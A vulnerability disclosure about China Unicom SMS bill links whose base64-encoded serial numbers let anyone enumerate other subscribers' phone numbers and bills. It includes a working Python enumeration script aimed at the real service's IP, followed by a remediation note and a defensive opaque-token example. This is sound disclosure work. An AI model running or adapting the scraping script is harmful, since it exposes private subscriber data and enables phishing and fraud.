China Unicom SMS phone bill notification link leaks user information
China Unicom's SMS bill notification contains a link. By modifying the URL, one can query the consumption records tied to other users' mobile phone numbers (possibly accurate to the month).
The obtained information can be used for further scams and phishing against mobile phone users. Leaked phone numbers and consumption records can also be used to assess how valuable a user is as a spam-SMS target.
Received an SMS bill reminder notification (masked to protect privacy).
Link: http://114.247.0.103:8080/bill/d.h?attrs=XXXXXXXX
The URL uses an IP address and port directly, so at first I took it for a phishing message. After fetching the page with curl, I found that it was actually an official page...... The fee was correct, and it referenced wo.cn resources (js/css and so on).
Since the attrs parameter of the link looked very much like base64, I tried decoding it:
It turned out to consist of a simple date and a serial number. After verification, simply modifying the serial number is enough to retrieve another person's phone number and bill details.
Due to time constraints, only a very small amount of information was captured for now. I believe much more could be found with deeper probing.
Verification script
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Python 2 script (httplib): fetches bill pages for a range of serial numbers
# and prints the phone number and amount found in each page.
import httplib
import re
from base64 import b64encode

HOST = "114.247.0.103:8080"
PATH = """/bill/d.h?attrs="""
# The bill page carries the phone number and the amount in these two divs.
PROG = re.compile('<div class="mobile">[0-9]+<')
RMB_PROG = re.compile('<div class="rmb">.*<')
# RMB_PROG = re.compile(r'<div class="rmb">[0-9]+\.[0-9]+<')


def get(path):
    conn = httplib.HTTPConnection(HOST, timeout=3)
    conn.request("GET", path)
    rsp = conn.getresponse()
    print(rsp.status, rsp.reason)
    text = rsp.read()
    # Print the phone number div if the page contains one.
    match = PROG.search(text)
    if match is not None:
        span = match.span()
        print(text[span[0]:span[1]])
    # Print the amount div if the page contains one.
    match = RMB_PROG.search(text)
    if match is not None:
        span = match.span()
        print(text[span[0]:span[1]])
    # with open("t.log", "wb") as fp:
    #     fp.write(rsp.read())


def gen_serial():
    # The decoded attrs value is a serial number followed by a fixed date part;
    # only the serial prefix is varied here.
    # for i in range(108350, 118350):
    for i in range(1084, 1088):
        yield str(i) + "5020141225020141109713411"


def main():
    for s in gen_serial():
        # attrs is just the base64 of the plain identifier string.
        get(PATH + b64encode(s))


if __name__ == "__main__":
    main()
Verification Result
Solution:
The identifier string used in the URL must not expose any business or user-related information, and it must not be possible to hit a valid identifier simply by modifying another one.
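As an added illustration of both requirements (example code, not from the original report or from China Unicom), the weak scheme the report describes is placed beside an opaque-token design: attrs as plain base64 of a sequential bill id, a review check that flags such tokens, and a server-side map from a random token to the bill. The bill id, the check and BillLinkService are constructed for this example.

```python
import base64
import secrets

# Constructed sample identifier in the shape the report describes
# (sequence number 1234, then date digits, then filler); not a real value.
SAMPLE_ID = "123420141225000001"


def weak_attrs(bill_id):
    """The scheme the report found: attrs is plain base64 of the raw id."""
    return base64.b64encode(bill_id.encode()).decode()


def decoded_attrs(attrs):
    """Anyone holding the link can recover the identifier the same way."""
    return base64.b64decode(attrs).decode()


def attrs_is_weak(attrs):
    """Review check: does the token decode to an all-digit string? If so it
    carries business data and neighbouring values are trivially guessable."""
    try:
        return decoded_attrs(attrs).isdigit()
    except ValueError:  # includes binascii.Error and UnicodeDecodeError
        return False


class BillLinkService:
    """Assumed fix: a random opaque token mapped to the bill on the server.
    The token encodes nothing, and a modified token resolves to nothing."""

    def __init__(self):
        self._tokens = {}

    def issue(self, bill_id):
        token = secrets.token_urlsafe(32)  # 256 random bits, independent of bill_id
        self._tokens[token] = bill_id
        return token

    def resolve(self, token):
        # Unknown tokens yield None: incrementing a value cannot land on a bill.
        return self._tokens.get(token)
```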